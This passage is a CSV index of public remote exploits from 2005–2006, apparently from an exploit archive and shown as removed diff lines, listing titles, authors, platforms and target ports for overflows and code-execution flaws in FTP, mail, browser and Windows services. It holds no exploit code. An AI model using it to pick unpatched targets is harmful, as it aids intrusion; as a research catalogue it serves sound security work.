(3)",2005-04-12,class101,windows,remote,42 -915,exploits/linux/remote/915.c,"MailEnable Enterprise 1.x - IMAPd Remote Overflow",2005-04-05,Expanders,linux,remote,143 -930,exploits/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote, -934,exploits/linux/remote/934.c,"gld 1.4 - Postfix Greylisting Daemon Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 -940,exploits/linux/remote/940.c,"Sumus 0.2.2 - HTTPd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 -943,exploits/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote, -944,exploits/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote, -945,exploits/windows/remote/945.c,"PMSoftware Simple Web Server - GET Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80 -947,exploits/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 -949,exploits/windows/remote/949.c,"PMSoftware Simple Web Server 1.0 - Remote Stack Overflow",2005-04-20,c0d3r,windows,remote,80 -952,exploits/windows/remote/952.pl,"MailEnable Enterprise & Professional - https Remote Buffer Overflow",2005-04-25,CorryL,windows,remote,8080 -953,exploits/windows/remote/953.c,"Yager 5.24 - Remote Buffer Overflow",2005-04-25,cybertronic,windows,remote,1089 -955,exploits/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow",2005-04-26,"Sergio Alvarez",windows,remote,21 -960,exploits/windows/remote/960.c,"MySQL MaxDB Webtool 7.5.00.23 - Remote Stack Overflow",2005-04-27,cybertronic,windows,remote,9999 -967,exploits/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)",2005-04-29,ATmaCA,windows,remote,21 -968,exploits/windows/remote/968.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)",2005-04-29,c0d3r,windows,remote,21 -969,exploits/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,windows,remote,21 -970,exploits/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,linux,remote,164 -975,exploits/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow",2005-05-01,muts,windows,remote,21 -976,exploits/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,windows,remote, -977,exploits/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force",2005-05-03,phased,hp-ux,remote, -979,exploits/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote, -981,exploits/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String",2005-05-05,cybertronic,linux,remote,25 -986,exploits/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",windows,remote, -987,exploits/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote, -990,exploits/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)",2005-05-17,nolimit,windows,remote,20031 -1007,exploits/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,multiple,remote, -1021,exploits/linux/remote/1021.c,"Ethereal 0.10.10 - 'SIP' Protocol Dissector Remote Buffer Overflow",2005-05-31,"Team W00dp3ck3r",linux,remote, -1026,exploits/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow",2005-06-02,"Jerome Athias",windows,remote,143 -1028,exploits/windows/remote/1028.c,"Crob FTP Server 3.6.1 - Remote Stack Overflow",2005-06-03,"Leon Juranic",windows,remote, -1035,exploits/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 -1038,exploits/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String",2005-06-10,qobaiashi,linux,remote,143 -1047,exploits/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - 'addschup' Remote Cookie",2005-06-14,"Kevin Finisterre",linux,remote,8080 -1055,exploits/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,linux,remote,7144 -1066,exploits/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote, -1075,exploits/windows/remote/1075.c,"Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 -1079,exploits/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow",2005-07-05,k-otik,windows,remote, -1081,exploits/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",hardware,remote, -1089,exploits/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,windows,remote, -1096,exploits/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 - Change Credit Limit",2005-07-10,"Soroush Dalili",windows,remote, -1099,exploits/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation",2005-07-11,basher13,windows,remote, -1102,exploits/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution",2005-07-13,"Michael Krax",windows,remote, -1108,exploits/windows/remote/1108.pl,"Small HTTP Server 3.05.28 - Arbitrary Data Execution",2005-07-15,basher13,windows,remote, -1114,exploits/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote Command Execution",2000-12-21,DiGiT,multiple,remote,5555 -1115,exploits/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote, -1118,exploits/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,windows,remote,21 -1123,exploits/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,linux,remote,143 -1124,exploits/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,linux,remote,143 -1130,exploits/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow",2005-08-03,cybertronic,windows,remote,6070 -1131,exploits/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Remote Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 -1132,exploits/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Remote Overflow",2005-08-03,cybertronic,windows,remote,6070 -1138,exploits/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution",2005-08-05,CoKi,linux,remote, -1139,exploits/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,linux,remote, -1144,exploits/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)",2005-08-09,FrSIRT,windows,remote, -1146,exploits/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 -1147,exploits/windows/remote/1147.pm,"Veritas Backup Exec (Windows) - Remote File Access (Metasploit)",2005-08-11,Metasploit,windows,remote,10000 -1149,exploits/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 -1150,exploits/windows/remote/1150.pm,"Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,1761 -1151,exploits/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,143 -1152,exploits/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,8008 -1167,exploits/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete (Metasploit)",2005-08-19,Optyx,solaris,remote, -1171,exploits/linux/remote/1171.c,"Elm < 2.5.8 - Expires Header Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote, -1178,exploits/windows/remote/1178.c,"Microsoft IIS 5.0 - '500-100.asp' Server Name Spoof",2005-08-25,Lympex,windows,remote, -1179,exploits/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal (Spanish) (MS05-039)",2005-08-25,RoMaNSoFt,windows,remote,445 -1180,exploits/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service (French) - Remote Universal (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 -1183,exploits/windows/remote/1183.c,"Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote, -1184,exploits/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 -1188,exploits/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Command Execution",2005-08-30,Lympex,multiple,remote, -1190,exploits/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow",2005-08-31,jpno5,windows,remote,6129 -1193,exploits/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote, -1201,exploits/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution",2005-09-07,basher13,windows,remote, -1209,exploits/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - 'Search' Remote Format String",2005-09-10,"Clément Lecigne",linux,remote,143 -1210,exploits/windows/remote/1210.pm,"Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)",2005-09-11,y0,windows,remote,1000 -1223,exploits/windows/remote/1223.c,"Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow",2005-09-20,c0d3r,windows,remote,143 -1224,exploits/windows/remote/1224.html,"Mozilla Browsers - 0xAD (HOST:) Remote Heap Buffer Overrun (2)",2005-09-22,Skylined,windows,remote, -1231,exploits/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution",2005-09-24,kingcope,linux,remote,21 -1232,exploits/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String",2005-09-26,c0ntex,linux,remote, -1234,exploits/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - 'Search' Remote Format String",2005-09-26,"Angelo Rosiello",bsd,remote,143 -1238,exploits/linux/remote/1238.c,"Prozilla 1.3.7.4 - 'ftpsearch' Results Handling Buffer Overflow",2005-10-02,taviso,linux,remote,8080 -1242,exploits/linux/remote/1242.pl,"Xine-Lib 1.1 - 'Media Player Library' Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote, -1243,exploits/windows/remote/1243.c,"CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 -1247,exploits/linux/remote/1247.pl,"phpBB 2.0.13 - 'admin_styles.php' Remote Command Execution",2005-10-11,RusH,linux,remote, -1258,exploits/linux/remote/1258.php,"e107 < 0.6172 - 'resetcore.php' SQL Injection",2005-10-18,rgod,linux,remote, -1259,exploits/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing (Metasploit)",2005-10-19,Optyx,hp-ux,remote, -1260,exploits/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 -1261,exploits/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 -1262,exploits/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM 'log_security()' Remote Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 -1263,exploits/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,exploits/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 -1265,exploits/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",osx,remote,13722 -1272,exploits/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote, -1277,exploits/windows/remote/1277.c,"Mirabilis ICQ 2003a - Remote Buffer Overflow Download Shellcode",2005-10-29,ATmaCA,windows,remote, -1279,exploits/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote, -1288,exploits/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow",2005-11-02,xwings,linux,remote, -1290,exploits/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote, -1291,exploits/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote, -1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 -1295,exploits/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21 -1313,exploits/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (3)",2005-11-11,xort,windows,remote, -1314,exploits/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (4)",2005-11-11,xwings,linux,remote, -1330,exploits/windows/remote/1330.c,"freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21 -1332,exploits/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging Buffer Overflow (Metasploit)",2005-11-20,y0,windows,remote,143 -1333,exploits/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",hardware,remote,80 -1352,exploits/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote, -1355,exploits/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - 'syslog()' Remote Format String",2005-12-03,"Kevin Finisterre",linux,remote, -1357,exploits/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow",2005-12-04,"Kevin Finisterre",windows,remote, -1365,exploits/windows/remote/1365.pm,"Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)",2005-12-08,y0,windows,remote,8080 -1366,exploits/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)",2005-12-09,"H D Moore",windows,remote, -1369,exploits/multiple/remote/1369.html,"Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution",2005-12-12,"Aviv Raff",multiple,remote, -1374,exploits/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)",2005-12-15,"Mariano Nuñez",windows,remote, -1375,exploits/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow",2005-12-16,kingcope,windows,remote,105 -1378,exploits/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - 'EXAMINE' Remote Buffer Overflow",2005-12-19,muts,windows,remote, -1380,exploits/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,windows,remote,143 -1381,exploits/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 -1391,exploits/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote, -1408,exploits/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80 -1413,exploits/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)",2006-01-12,ZwelL,windows,remote, -1414,exploits/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)",2006-01-12,kokanin,windows,remote,5060 -1417,exploits/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - 'FTP' Remote System Access",2006-01-14,kokanin,windows,remote,22003 -1420,exploits/windows/remote/1420.c,"Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)",2006-01-15,darkeagle,windows,remote, -1421,exploits/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701 -1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",windows,remote, -1452,exploits/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,windows,remote,21 -1456,exploits/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request 'Leaked' Format String",2006-01-28,crash-x,linux,remote,8000 -1458,exploits/windows/remote/1458.cpp,"Winamp 5.12 - '.pls' Remote Buffer Overflow (1)",2006-01-29,ATmaCA,windows,remote, -1460,exploits/windows/remote/1460.pm,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)",2006-01-31,"H D Moore",windows,remote, -1462,exploits/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 -1463,exploits/windows/remote/1463.pm,"SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)",2006-02-01,y0,windows,remote,21 -1466,exploits/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - RPCT TO Remote Buffer Overflow",2006-02-03,"securma massine",windows,remote,25 -1474,exploits/linux/remote/1474.pm,"Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)",2006-02-07,"H D Moore",linux,remote, -1480,exploits/osx/remote/1480.pm,"Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote, -1486,exploits/linux/remote/1486.c,"Power Daemon 2.0.2 - 'WHATIDO' Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532 -1487,exploits/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",linux,remote,1589 -1502,exploits/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)",2006-02-16,redsand,windows,remote, -1504,exploits/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote, -1505,exploits/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote, -1506,exploits/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote, -1519,exploits/osx/remote/1519.pm,"Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)",2006-02-22,"H D Moore",osx,remote, -1520,exploits/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote, -1536,exploits/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)",2006-02-28,"H D Moore",windows,remote, -1537,exploits/windows/remote/1537.pm,"Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,windows,remote,44334 -1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow (PoC)",2006-03-07,"securma massine",windows,remote,110 -1574,exploits/linux/remote/1574.c,"PeerCast 0.1216 - 'nextCGIarg' Remote Buffer Overflow (1)",2006-03-11,prdelka,linux,remote,7144 -1578,exploits/linux/remote/1578.c,"PeerCast 0.1216 - 'nextCGIarg' Remote Buffer Overflow (2)",2006-03-12,darkeagle,linux,remote,7144 -1582,exploits/linux/remote/1582.c,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",2006-03-13,landser,linux,remote,13327 -1583,exploits/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - Real Name Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 -1592,exploits/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote, -1602,exploits/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000 -1606,exploits/windows/remote/1606.html,"Microsoft Internet Explorer - 'createTextRang' Remote Code Execution",2006-03-23,darkeagle,windows,remote, -1607,exploits/windows/remote/1607.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode (1)",2006-03-23,ATmaCA,windows,remote, -1620,exploits/windows/remote/1620.pm,"Microsoft Internet Explorer - 'createTextRang' Remote (Metasploit)",2006-04-01,"Randy Flood",windows,remote, -1626,exploits/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 -1628,exploits/windows/remote/1628.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode (2)",2006-03-31,ATmaCA,windows,remote, -1664,exploits/windows/remote/1664.py,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Remote Buffer Overflow",2006-04-11,"Paul Haas",windows,remote, -1679,exploits/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 -1681,exploits/windows/remote/1681.pm,"Sybase EAServer 5.2 - WebConsole Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080 -1703,exploits/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password",2006-04-21,"Marc Bevand",windows,remote,8004 -1717,exploits/linux/remote/1717.c,"Fenice Oms 1.10 - GET Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote, -1739,exploits/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote, -1741,exploits/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",linux,remote,3306 -1742,exploits/linux/remote/1742.c,"MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage",2006-05-02,"Stefano Di Paola",linux,remote, -1750,exploits/linux/remote/1750.c,"Quake 3 Engine 1.32b - 'R_RemapShader()' Remote Client Buffer Overflow",2006-05-05,landser,linux,remote, -1776,exploits/windows/remote/1776.c,"Medal of Honor - 'getinfo' Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203 -1787,exploits/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22 -1788,exploits/windows/remote/1788.pm,"PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote, -1791,exploits/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass",2006-05-16,redsand,multiple,remote,5900 -1794,exploits/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 -1799,exploits/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote, -1813,exploits/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110 -1862,exploits/cgi/remote/1862.c,"iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI)",2006-06-02,K-sPecial,cgi,remote, -1885,exploits/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 -1889,exploits/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,hardware,remote, -1906,exploits/windows/remote/1906.py,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow",2006-06-12,h07,windows,remote, -1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote, -1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 -1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 -1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,multiple,remote,10000 -2014,exploits/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",windows,remote,515 -2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,multiple,remote,10000 -2034,exploits/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",hardware,remote, -2047,exploits/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",windows,remote, -2048,exploits/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution",2006-07-20,"Jon Hart",hardware,remote, -2052,exploits/windows/remote/2052.sh,"Microsoft Internet Explorer - MDAC Remote Code Execution (MS06-014)",2006-07-21,redsand,windows,remote, -2053,exploits/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (2)",2006-07-21,bannedit,multiple,remote,110 -2054,exploits/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast (MS06-036)",2006-07-21,redsand,windows,remote, -2061,exploits/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote, -2070,exploits/windows/remote/2070.pl,"SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 -2074,exploits/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)",2006-07-26,ri0t,windows,remote,10616 -2075,exploits/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-07-26,ri0t,windows,remote, -2076,exploits/windows/remote/2076.pl,"AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061 -2079,exploits/windows/remote/2079.pl,"eIQnetworks ESA - Syslog Server Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345 -2080,exploits/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 -2082,exploits/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote, -2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote, -2140,exploits/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)",2006-08-07,ri0t,windows,remote,10616 -2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-08,PATz,hardware,remote, -2162,exploits/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445 -2164,exploits/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote, -2185,exploits/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110 -2223,exploits/windows/remote/2223.c,"Microsoft Windows - 